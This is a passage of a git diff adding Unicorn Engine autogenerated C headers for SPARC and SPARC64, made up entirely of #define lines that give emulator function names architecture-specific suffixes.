+#define sub128 sub128_sparc +#define sub16_sat sub16_sat_sparc +#define sub16_usat sub16_usat_sparc +#define sub192 sub192_sparc +#define sub8_sat sub8_sat_sparc +#define sub8_usat sub8_usat_sparc +#define subFloat128Sigs subFloat128Sigs_sparc +#define subFloat32Sigs subFloat32Sigs_sparc +#define subFloat64Sigs subFloat64Sigs_sparc +#define subFloatx80Sigs subFloatx80Sigs_sparc +#define subpage_accepts subpage_accepts_sparc +#define subpage_init subpage_init_sparc +#define subpage_ops subpage_ops_sparc +#define subpage_read subpage_read_sparc +#define subpage_register subpage_register_sparc +#define subpage_write subpage_write_sparc +#define suffix_mul suffix_mul_sparc +#define swap_commutative swap_commutative_sparc +#define swap_commutative2 swap_commutative2_sparc +#define switch_mode switch_mode_sparc +#define switch_v7m_sp switch_v7m_sp_sparc +#define syn_aa32_bkpt syn_aa32_bkpt_sparc +#define syn_aa32_hvc syn_aa32_hvc_sparc +#define syn_aa32_smc syn_aa32_smc_sparc +#define syn_aa32_svc syn_aa32_svc_sparc +#define syn_breakpoint syn_breakpoint_sparc +#define sync_globals sync_globals_sparc +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_sparc +#define syn_cp14_rt_trap syn_cp14_rt_trap_sparc +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_sparc +#define syn_cp15_rt_trap syn_cp15_rt_trap_sparc +#define syn_data_abort syn_data_abort_sparc +#define syn_fp_access_trap syn_fp_access_trap_sparc +#define syn_insn_abort syn_insn_abort_sparc +#define syn_swstep syn_swstep_sparc +#define syn_uncategorized syn_uncategorized_sparc +#define syn_watchpoint syn_watchpoint_sparc +#define syscall_err syscall_err_sparc +#define system_bus_class_init system_bus_class_init_sparc +#define system_bus_info system_bus_info_sparc +#define t2ee_cp_reginfo t2ee_cp_reginfo_sparc +#define table_logic_cc table_logic_cc_sparc +#define target_parse_constraint target_parse_constraint_sparc +#define target_words_bigendian target_words_bigendian_sparc +#define tb_add_jump tb_add_jump_sparc +#define tb_alloc tb_alloc_sparc +#define tb_alloc_page tb_alloc_page_sparc +#define tb_check_watchpoint tb_check_watchpoint_sparc +#define tb_find_fast tb_find_fast_sparc +#define tb_find_pc tb_find_pc_sparc +#define tb_find_slow tb_find_slow_sparc +#define tb_flush tb_flush_sparc +#define tb_flush_jmp_cache tb_flush_jmp_cache_sparc +#define tb_free tb_free_sparc +#define tb_gen_code tb_gen_code_sparc +#define tb_hash_remove tb_hash_remove_sparc +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_sparc +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_sparc +#define tb_invalidate_phys_range tb_invalidate_phys_range_sparc +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_sparc +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_sparc +#define tb_jmp_remove tb_jmp_remove_sparc +#define tb_link_page tb_link_page_sparc +#define tb_page_remove tb_page_remove_sparc +#define tb_phys_hash_func tb_phys_hash_func_sparc +#define tb_phys_invalidate tb_phys_invalidate_sparc +#define tb_reset_jump tb_reset_jump_sparc +#define tb_set_jmp_target tb_set_jmp_target_sparc +#define tcg_accel_class_init tcg_accel_class_init_sparc +#define tcg_accel_type tcg_accel_type_sparc +#define tcg_add_param_i32 tcg_add_param_i32_sparc +#define tcg_add_param_i64 tcg_add_param_i64_sparc +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_sparc +#define tcg_allowed tcg_allowed_sparc +#define tcg_canonicalize_memop tcg_canonicalize_memop_sparc +#define tcg_commit tcg_commit_sparc +#define tcg_cond_to_jcc tcg_cond_to_jcc_sparc +#define tcg_constant_folding tcg_constant_folding_sparc +#define tcg_const_i32 tcg_const_i32_sparc +#define tcg_const_i64 tcg_const_i64_sparc +#define tcg_const_local_i32 tcg_const_local_i32_sparc +#define tcg_const_local_i64 tcg_const_local_i64_sparc +#define tcg_context_init tcg_context_init_sparc +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_sparc +#define tcg_cpu_exec tcg_cpu_exec_sparc +#define tcg_current_code_size tcg_current_code_size_sparc +#define tcg_dump_info tcg_dump_info_sparc +#define tcg_dump_ops tcg_dump_ops_sparc +#define tcg_exec_all tcg_exec_all_sparc +#define tcg_find_helper tcg_find_helper_sparc +#define tcg_func_start tcg_func_start_sparc +#define tcg_gen_abs_i32 tcg_gen_abs_i32_sparc +#define tcg_gen_add2_i32 tcg_gen_add2_i32_sparc +#define tcg_gen_add_i32 tcg_gen_add_i32_sparc +#define tcg_gen_add_i64 tcg_gen_add_i64_sparc +#define tcg_gen_addi_i32 tcg_gen_addi_i32_sparc +#define tcg_gen_addi_i64 tcg_gen_addi_i64_sparc +#define tcg_gen_andc_i32 tcg_gen_andc_i32_sparc +#define tcg_gen_and_i32 tcg_gen_and_i32_sparc +#define tcg_gen_and_i64 tcg_gen_and_i64_sparc +#define tcg_gen_andi_i32 tcg_gen_andi_i32_sparc +#define tcg_gen_andi_i64 tcg_gen_andi_i64_sparc +#define tcg_gen_br tcg_gen_br_sparc +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_sparc +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_sparc +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_sparc +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_sparc +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_sparc +#define tcg_gen_callN tcg_gen_callN_sparc +#define tcg_gen_code tcg_gen_code_sparc +#define tcg_gen_code_common tcg_gen_code_common_sparc +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_sparc +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_sparc +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_sparc +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_sparc +#define tcg_gen_exit_tb tcg_gen_exit_tb_sparc +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_sparc +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_sparc +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_sparc +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_sparc +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_sparc +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_sparc +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_sparc +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_sparc +#define tcg_gen_goto_tb tcg_gen_goto_tb_sparc +#define tcg_gen_ld_i32 tcg_gen_ld_i32_sparc +#define tcg_gen_ld_i64 tcg_gen_ld_i64_sparc +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_sparc +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_sparc +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_sparc +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_sparc +#define tcg_gen_mov_i32 tcg_gen_mov_i32_sparc +#define tcg_gen_mov_i64 tcg_gen_mov_i64_sparc +#define tcg_gen_movi_i32 tcg_gen_movi_i32_sparc +#define tcg_gen_movi_i64 tcg_gen_movi_i64_sparc +#define tcg_gen_mul_i32 tcg_gen_mul_i32_sparc +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_sparc +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_sparc +#define tcg_gen_neg_i32 tcg_gen_neg_i32_sparc +#define tcg_gen_neg_i64 tcg_gen_neg_i64_sparc +#define tcg_gen_not_i32 tcg_gen_not_i32_sparc +#define tcg_gen_op0 tcg_gen_op0_sparc +#define tcg_gen_op1i tcg_gen_op1i_sparc +#define tcg_gen_op2_i32 tcg_gen_op2_i32_sparc +#define tcg_gen_op2_i64 tcg_gen_op2_i64_sparc +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_sparc +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_sparc +#define tcg_gen_op3_i32 tcg_gen_op3_i32_sparc +#define tcg_gen_op3_i64 tcg_gen_op3_i64_sparc +#define tcg_gen_op4_i32 tcg_gen_op4_i32_sparc +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_sparc +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_sparc +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_sparc +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_sparc +#define tcg_gen_op6_i32 tcg_gen_op6_i32_sparc +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_sparc +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_sparc +#define tcg_gen_orc_i32 tcg_gen_orc_i32_sparc +#define tcg_gen_or_i32 tcg_gen_or_i32_sparc +#define tcg_gen_or_i64 tcg_gen_or_i64_sparc +#define tcg_gen_ori_i32 tcg_gen_ori_i32_sparc +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_sparc +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_sparc +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_sparc +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_sparc +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_sparc +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_sparc +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_sparc +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_sparc +#define tcg_gen_sar_i32 tcg_gen_sar_i32_sparc +#define tcg_gen_sari_i32 tcg_gen_sari_i32_sparc +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_sparc +#define tcg_gen_shl_i32 tcg_gen_shl_i32_sparc +#define tcg_gen_shl_i64 tcg_gen_shl_i64_sparc +#define tcg_gen_shli_i32 tcg_gen_shli_i32_sparc +#define tcg_gen_shli_i64 tcg_gen_shli_i64_sparc +#define tcg_gen_shr_i32 tcg_gen_shr_i32_sparc +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_sparc +#define tcg_gen_shr_i64 tcg_gen_shr_i64_sparc +#define tcg_gen_shri_i32 tcg_gen_shri_i32_sparc +#define tcg_gen_shri_i64 tcg_gen_shri_i64_sparc +#define tcg_gen_st_i32 tcg_gen_st_i32_sparc +#define tcg_gen_st_i64 tcg_gen_st_i64_sparc +#define tcg_gen_sub_i32 tcg_gen_sub_i32_sparc +#define tcg_gen_sub_i64 tcg_gen_sub_i64_sparc +#define tcg_gen_subi_i32 tcg_gen_subi_i32_sparc +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_sparc +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_sparc +#define tcg_gen_xor_i32 tcg_gen_xor_i32_sparc +#define tcg_gen_xor_i64 tcg_gen_xor_i64_sparc +#define tcg_gen_xori_i32 tcg_gen_xori_i32_sparc +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_sparc +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_sparc +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_sparc +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_sparc +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_sparc +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_sparc +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_sparc +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_sparc +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_sparc +#define tcg_handle_interrupt tcg_handle_interrupt_sparc +#define tcg_init tcg_init_sparc +#define tcg_invert_cond tcg_invert_cond_sparc +#define tcg_la_bb_end tcg_la_bb_end_sparc +#define tcg_la_br_end tcg_la_br_end_sparc +#define tcg_la_func_end tcg_la_func_end_sparc +#define tcg_liveness_analysis tcg_liveness_analysis_sparc +#define tcg_malloc tcg_malloc_sparc +#define tcg_malloc_internal tcg_malloc_internal_sparc +#define tcg_op_defs_org tcg_op_defs_org_sparc +#define tcg_opt_gen_mov tcg_opt_gen_mov_sparc +#define tcg_opt_gen_movi tcg_opt_gen_movi_sparc +#define tcg_optimize tcg_optimize_sparc +#define tcg_out16 tcg_out16_sparc +#define tcg_out32 tcg_out32_sparc +#define tcg_out64 tcg_out64_sparc +#define tcg_out8 tcg_out8_sparc +#define tcg_out_addi tcg_out_addi_sparc +#define tcg_out_branch tcg_out_branch_sparc +#define tcg_out_brcond32 tcg_out_brcond32_sparc +#define tcg_out_brcond64 tcg_out_brcond64_sparc +#define tcg_out_bswap32 tcg_out_bswap32_sparc +#define tcg_out_bswap64 tcg_out_bswap64_sparc +#define tcg_out_call tcg_out_call_sparc +#define tcg_out_cmp tcg_out_cmp_sparc +#define tcg_out_ext16s tcg_out_ext16s_sparc +#define tcg_out_ext16u tcg_out_ext16u_sparc +#define tcg_out_ext32s tcg_out_ext32s_sparc +#define tcg_out_ext32u tcg_out_ext32u_sparc +#define tcg_out_ext8s tcg_out_ext8s_sparc +#define tcg_out_ext8u tcg_out_ext8u_sparc +#define tcg_out_jmp tcg_out_jmp_sparc +#define tcg_out_jxx tcg_out_jxx_sparc +#define tcg_out_label tcg_out_label_sparc +#define tcg_out_ld tcg_out_ld_sparc +#define tcg_out_modrm tcg_out_modrm_sparc +#define tcg_out_modrm_offset tcg_out_modrm_offset_sparc +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_sparc +#define tcg_out_mov tcg_out_mov_sparc +#define tcg_out_movcond32 tcg_out_movcond32_sparc +#define tcg_out_movcond64 tcg_out_movcond64_sparc +#define tcg_out_movi tcg_out_movi_sparc +#define tcg_out_op tcg_out_op_sparc +#define tcg_out_pop tcg_out_pop_sparc +#define tcg_out_push tcg_out_push_sparc +#define tcg_out_qemu_ld tcg_out_qemu_ld_sparc +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_sparc +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_sparc +#define tcg_out_qemu_st tcg_out_qemu_st_sparc +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_sparc +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_sparc +#define tcg_out_reloc tcg_out_reloc_sparc +#define tcg_out_rolw_8 tcg_out_rolw_8_sparc +#define tcg_out_setcond32 tcg_out_setcond32_sparc +#define tcg_out_setcond64 tcg_out_setcond64_sparc +#define tcg_out_shifti tcg_out_shifti_sparc +#define tcg_out_st tcg_out_st_sparc +#define tcg_out_tb_finalize tcg_out_tb_finalize_sparc +#define tcg_out_tb_init tcg_out_tb_init_sparc +#define tcg_out_tlb_load tcg_out_tlb_load_sparc +#define tcg_out_vex_modrm tcg_out_vex_modrm_sparc +#define tcg_patch32 tcg_patch32_sparc +#define tcg_patch8 tcg_patch8_sparc +#define tcg_pcrel_diff tcg_pcrel_diff_sparc +#define tcg_pool_reset tcg_pool_reset_sparc +#define tcg_prologue_init tcg_prologue_init_sparc +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_sparc +#define tcg_reg_alloc tcg_reg_alloc_sparc +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_sparc +#define tcg_reg_alloc_call tcg_reg_alloc_call_sparc +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_sparc +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_sparc +#define tcg_reg_alloc_op tcg_reg_alloc_op_sparc +#define tcg_reg_alloc_start tcg_reg_alloc_start_sparc +#define tcg_reg_free tcg_reg_free_sparc +#define tcg_reg_sync tcg_reg_sync_sparc +#define tcg_set_frame tcg_set_frame_sparc +#define tcg_set_nop tcg_set_nop_sparc +#define tcg_swap_cond tcg_swap_cond_sparc +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_sparc +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_sparc +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_sparc +#define tcg_target_const_match tcg_target_const_match_sparc +#define tcg_target_init tcg_target_init_sparc +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_sparc +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_sparc +#define tcg_temp_alloc tcg_temp_alloc_sparc +#define tcg_temp_free_i32 tcg_temp_free_i32_sparc +#define tcg_temp_free_i64 tcg_temp_free_i64_sparc +#define tcg_temp_free_internal tcg_temp_free_internal_sparc +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_sparc +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_sparc +#define tcg_temp_new_i32 tcg_temp_new_i32_sparc +#define tcg_temp_new_i64 tcg_temp_new_i64_sparc +#define tcg_temp_new_internal tcg_temp_new_internal_sparc +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_sparc +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_sparc +#define tdb_hash tdb_hash_sparc +#define teecr_write teecr_write_sparc +#define teehbr_access teehbr_access_sparc +#define temp_allocate_frame temp_allocate_frame_sparc +#define temp_dead temp_dead_sparc +#define temps_are_copies temps_are_copies_sparc +#define temp_save temp_save_sparc +#define temp_sync temp_sync_sparc +#define tgen_arithi tgen_arithi_sparc +#define tgen_arithr tgen_arithr_sparc +#define thumb2_logic_op thumb2_logic_op_sparc +#define ti925t_initfn ti925t_initfn_sparc +#define tlb_add_large_page tlb_add_large_page_sparc +#define tlb_flush_entry tlb_flush_entry_sparc +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_sparc +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_sparc +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_sparc +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_sparc +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_sparc +#define tlbi_aa64_va_write tlbi_aa64_va_write_sparc +#define tlbiall_is_write tlbiall_is_write_sparc +#define tlbiall_write tlbiall_write_sparc +#define tlbiasid_is_write tlbiasid_is_write_sparc +#define tlbiasid_write tlbiasid_write_sparc +#define tlbimvaa_is_write tlbimvaa_is_write_sparc +#define tlbimvaa_write tlbimvaa_write_sparc +#define tlbimva_is_write tlbimva_is_write_sparc +#define tlbimva_write tlbimva_write_sparc +#define tlb_is_dirty_ram tlb_is_dirty_ram_sparc +#define tlb_protect_code tlb_protect_code_sparc +#define tlb_reset_dirty_range tlb_reset_dirty_range_sparc +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_sparc +#define tlb_set_dirty tlb_set_dirty_sparc +#define tlb_set_dirty1 tlb_set_dirty1_sparc +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_sparc +#define tlb_vaddr_to_host tlb_vaddr_to_host_sparc +#define token_get_type token_get_type_sparc +#define token_get_value token_get_value_sparc +#define token_is_escape token_is_escape_sparc +#define token_is_keyword token_is_keyword_sparc +#define token_is_operator token_is_operator_sparc +#define tokens_append_from_iter tokens_append_from_iter_sparc +#define to_qiv to_qiv_sparc +#define to_qov to_qov_sparc +#define tosa_init tosa_init_sparc +#define tosa_machine_init tosa_machine_init_sparc +#define tswap32 tswap32_sparc +#define tswap64 tswap64_sparc +#define type_class_get_size type_class_get_size_sparc +#define type_get_by_name type_get_by_name_sparc +#define type_get_parent type_get_parent_sparc +#define type_has_parent type_has_parent_sparc +#define type_initialize type_initialize_sparc +#define type_initialize_interface type_initialize_interface_sparc +#define type_is_ancestor type_is_ancestor_sparc +#define type_new type_new_sparc +#define type_object_get_size type_object_get_size_sparc +#define type_register_internal type_register_internal_sparc +#define type_table_add type_table_add_sparc +#define type_table_get type_table_get_sparc +#define type_table_lookup type_table_lookup_sparc +#define uint16_to_float32 uint16_to_float32_sparc +#define uint16_to_float64 uint16_to_float64_sparc +#define uint32_to_float32 uint32_to_float32_sparc +#define uint32_to_float64 uint32_to_float64_sparc +#define uint64_to_float128 uint64_to_float128_sparc +#define uint64_to_float32 uint64_to_float32_sparc +#define uint64_to_float64 uint64_to_float64_sparc +#define unassigned_io_ops unassigned_io_ops_sparc +#define unassigned_io_read unassigned_io_read_sparc +#define unassigned_io_write unassigned_io_write_sparc +#define unassigned_mem_accepts unassigned_mem_accepts_sparc +#define unassigned_mem_ops unassigned_mem_ops_sparc +#define unassigned_mem_read unassigned_mem_read_sparc +#define unassigned_mem_write unassigned_mem_write_sparc +#define update_spsel update_spsel_sparc +#define v6_cp_reginfo v6_cp_reginfo_sparc +#define v6k_cp_reginfo v6k_cp_reginfo_sparc +#define v7_cp_reginfo v7_cp_reginfo_sparc +#define v7mp_cp_reginfo v7mp_cp_reginfo_sparc +#define v7m_pop v7m_pop_sparc +#define v7m_push v7m_push_sparc +#define v8_cp_reginfo v8_cp_reginfo_sparc +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_sparc +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_sparc +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_sparc +#define vapa_cp_reginfo vapa_cp_reginfo_sparc +#define vbar_write vbar_write_sparc +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_sparc +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_sparc +#define vfp_get_fpcr vfp_get_fpcr_sparc +#define vfp_get_fpscr vfp_get_fpscr_sparc +#define vfp_get_fpsr vfp_get_fpsr_sparc +#define vfp_reg_offset vfp_reg_offset_sparc +#define vfp_set_fpcr vfp_set_fpcr_sparc +#define vfp_set_fpscr vfp_set_fpscr_sparc +#define vfp_set_fpsr vfp_set_fpsr_sparc +#define visit_end_implicit_struct visit_end_implicit_struct_sparc +#define visit_end_list visit_end_list_sparc +#define visit_end_struct visit_end_struct_sparc +#define visit_end_union visit_end_union_sparc +#define visit_get_next_type visit_get_next_type_sparc +#define visit_next_list visit_next_list_sparc +#define visit_optional visit_optional_sparc +#define visit_start_implicit_struct visit_start_implicit_struct_sparc +#define visit_start_list visit_start_list_sparc +#define visit_start_struct visit_start_struct_sparc +#define visit_start_union visit_start_union_sparc +#define vmsa_cp_reginfo vmsa_cp_reginfo_sparc +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_sparc +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_sparc +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_sparc +#define vmsa_ttbcr_write vmsa_ttbcr_write_sparc +#define vmsa_ttbr_write vmsa_ttbr_write_sparc +#define write_cpustate_to_list write_cpustate_to_list_sparc +#define write_list_to_cpustate write_list_to_cpustate_sparc +#define write_raw_cp_reg write_raw_cp_reg_sparc +#define X86CPURegister32_lookup X86CPURegister32_lookup_sparc +#define x86_op_defs x86_op_defs_sparc +#define xpsr_read xpsr_read_sparc +#define xpsr_write xpsr_write_sparc +#define xscale_cpar_write xscale_cpar_write_sparc +#define xscale_cp_reginfo xscale_cp_reginfo_sparc +#define cpu_sparc_exec cpu_sparc_exec_sparc +#define helper_compute_psr helper_compute_psr_sparc +#define helper_compute_C_icc helper_compute_C_icc_sparc +#define cpu_sparc_init cpu_sparc_init_sparc +#define cpu_sparc_set_id cpu_sparc_set_id_sparc +#define sparc_cpu_register_types sparc_cpu_register_types_sparc +#define helper_fadds helper_fadds_sparc +#define helper_faddd helper_faddd_sparc +#define helper_faddq helper_faddq_sparc +#define helper_fsubs helper_fsubs_sparc +#define helper_fsubd helper_fsubd_sparc +#define helper_fsubq helper_fsubq_sparc +#define helper_fmuls helper_fmuls_sparc +#define helper_fmuld helper_fmuld_sparc +#define helper_fmulq helper_fmulq_sparc +#define helper_fdivs helper_fdivs_sparc +#define helper_fdivd helper_fdivd_sparc +#define helper_fdivq helper_fdivq_sparc +#define helper_fsmuld helper_fsmuld_sparc +#define helper_fdmulq helper_fdmulq_sparc +#define helper_fnegs helper_fnegs_sparc +#define helper_fitos helper_fitos_sparc +#define helper_fitod helper_fitod_sparc +#define helper_fitoq helper_fitoq_sparc +#define helper_fdtos helper_fdtos_sparc +#define helper_fstod helper_fstod_sparc +#define helper_fqtos helper_fqtos_sparc +#define helper_fstoq helper_fstoq_sparc +#define helper_fqtod helper_fqtod_sparc +#define helper_fdtoq helper_fdtoq_sparc +#define helper_fstoi helper_fstoi_sparc +#define helper_fdtoi helper_fdtoi_sparc +#define helper_fqtoi helper_fqtoi_sparc +#define helper_fabss helper_fabss_sparc +#define helper_fsqrts helper_fsqrts_sparc +#define helper_fsqrtd helper_fsqrtd_sparc +#define helper_fsqrtq helper_fsqrtq_sparc +#define helper_fcmps helper_fcmps_sparc +#define helper_fcmpd helper_fcmpd_sparc +#define helper_fcmpes helper_fcmpes_sparc +#define helper_fcmped helper_fcmped_sparc +#define helper_fcmpq helper_fcmpq_sparc +#define helper_fcmpeq helper_fcmpeq_sparc +#define helper_ldfsr helper_ldfsr_sparc +#define helper_debug helper_debug_sparc +#define helper_udiv_cc helper_udiv_cc_sparc +#define helper_sdiv_cc helper_sdiv_cc_sparc +#define helper_taddcctv helper_taddcctv_sparc +#define helper_tsubcctv helper_tsubcctv_sparc +#define sparc_cpu_do_interrupt sparc_cpu_do_interrupt_sparc +#define helper_check_align helper_check_align_sparc +#define helper_ld_asi helper_ld_asi_sparc +#define helper_st_asi helper_st_asi_sparc +#define helper_cas_asi helper_cas_asi_sparc +#define helper_ldqf helper_ldqf_sparc +#define helper_stqf helper_stqf_sparc +#define sparc_cpu_unassigned_access sparc_cpu_unassigned_access_sparc +#define sparc_cpu_do_unaligned_access sparc_cpu_do_unaligned_access_sparc +#define sparc_cpu_handle_mmu_fault sparc_cpu_handle_mmu_fault_sparc +#define dump_mmu dump_mmu_sparc +#define sparc_cpu_get_phys_page_debug sparc_cpu_get_phys_page_debug_sparc +#define sparc_reg_reset sparc_reg_reset_sparc +#define sparc_reg_read sparc_reg_read_sparc +#define sparc_reg_write sparc_reg_write_sparc +#define gen_intermediate_code_init gen_intermediate_code_init_sparc +#define cpu_set_cwp cpu_set_cwp_sparc +#define cpu_get_psr cpu_get_psr_sparc +#define cpu_put_psr cpu_put_psr_sparc +#define cpu_cwp_inc cpu_cwp_inc_sparc +#define cpu_cwp_dec cpu_cwp_dec_sparc +#define helper_save helper_save_sparc +#define helper_restore helper_restore_sparc +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/sparc64.h b/ai_anti_malware/unicorn/unicorn-master/qemu/sparc64.h new file mode 100644 index 0000000..f389522 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/sparc64.h @@ -0,0 +1,3092 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_SPARC64_H +#define UNICORN_AUTOGEN_SPARC64_H +#define arm_release arm_release_sparc64 +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_sparc64 +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_sparc64 +#define use_idiv_instructions_rt use_idiv_instructions_rt_sparc64 +#define tcg_target_deposit_valid tcg_target_deposit_valid_sparc64 +#define helper_power_down helper_power_down_sparc64 +#define check_exit_request check_exit_request_sparc64 +#define address_space_unregister address_space_unregister_sparc64 +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_sparc64 +#define phys_mem_clean phys_mem_clean_sparc64 +#define tb_cleanup tb_cleanup_sparc64 +#define memory_map memory_map_sparc64 +#define memory_map_ptr memory_map_ptr_sparc64 +#define memory_unmap memory_unmap_sparc64 +#define memory_free memory_free_sparc64 +#define free_code_gen_buffer free_code_gen_buffer_sparc64 +#define helper_raise_exception helper_raise_exception_sparc64 +#define tcg_enabled tcg_enabled_sparc64 +#define tcg_exec_init tcg_exec_init_sparc64 +#define memory_register_types memory_register_types_sparc64 +#define cpu_exec_init_all cpu_exec_init_all_sparc64 +#define vm_start vm_start_sparc64 +#define resume_all_vcpus resume_all_vcpus_sparc64 +#define a15_l2ctlr_read a15_l2ctlr_read_sparc64 +#define a64_translate_init a64_translate_init_sparc64 +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_sparc64 +#define aa64_cacheop_access aa64_cacheop_access_sparc64 +#define aa64_daif_access aa64_daif_access_sparc64 +#define aa64_daif_write aa64_daif_write_sparc64 +#define aa64_dczid_read aa64_dczid_read_sparc64 +#define aa64_fpcr_read aa64_fpcr_read_sparc64 +#define aa64_fpcr_write aa64_fpcr_write_sparc64 +#define aa64_fpsr_read aa64_fpsr_read_sparc64 +#define aa64_fpsr_write aa64_fpsr_write_sparc64 +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_sparc64 +#define aa64_zva_access aa64_zva_access_sparc64 +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_sparc64 +#define aarch64_restore_sp aarch64_restore_sp_sparc64 +#define aarch64_save_sp aarch64_save_sp_sparc64 +#define accel_find accel_find_sparc64 +#define accel_init_machine accel_init_machine_sparc64 +#define accel_type accel_type_sparc64 +#define access_with_adjusted_size access_with_adjusted_size_sparc64 +#define add128 add128_sparc64 +#define add16_sat add16_sat_sparc64 +#define add16_usat add16_usat_sparc64 +#define add192 add192_sparc64 +#define add8_sat add8_sat_sparc64 +#define add8_usat add8_usat_sparc64 +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_sparc64 +#define add_cpreg_to_list add_cpreg_to_list_sparc64 +#define addFloat128Sigs addFloat128Sigs_sparc64 +#define addFloat32Sigs addFloat32Sigs_sparc64 +#define addFloat64Sigs addFloat64Sigs_sparc64 +#define addFloatx80Sigs addFloatx80Sigs_sparc64 +#define add_qemu_ldst_label add_qemu_ldst_label_sparc64 +#define address_space_access_valid address_space_access_valid_sparc64 +#define address_space_destroy address_space_destroy_sparc64 +#define address_space_destroy_dispatch address_space_destroy_dispatch_sparc64 +#define address_space_get_flatview address_space_get_flatview_sparc64 +#define address_space_init address_space_init_sparc64 +#define address_space_init_dispatch address_space_init_dispatch_sparc64 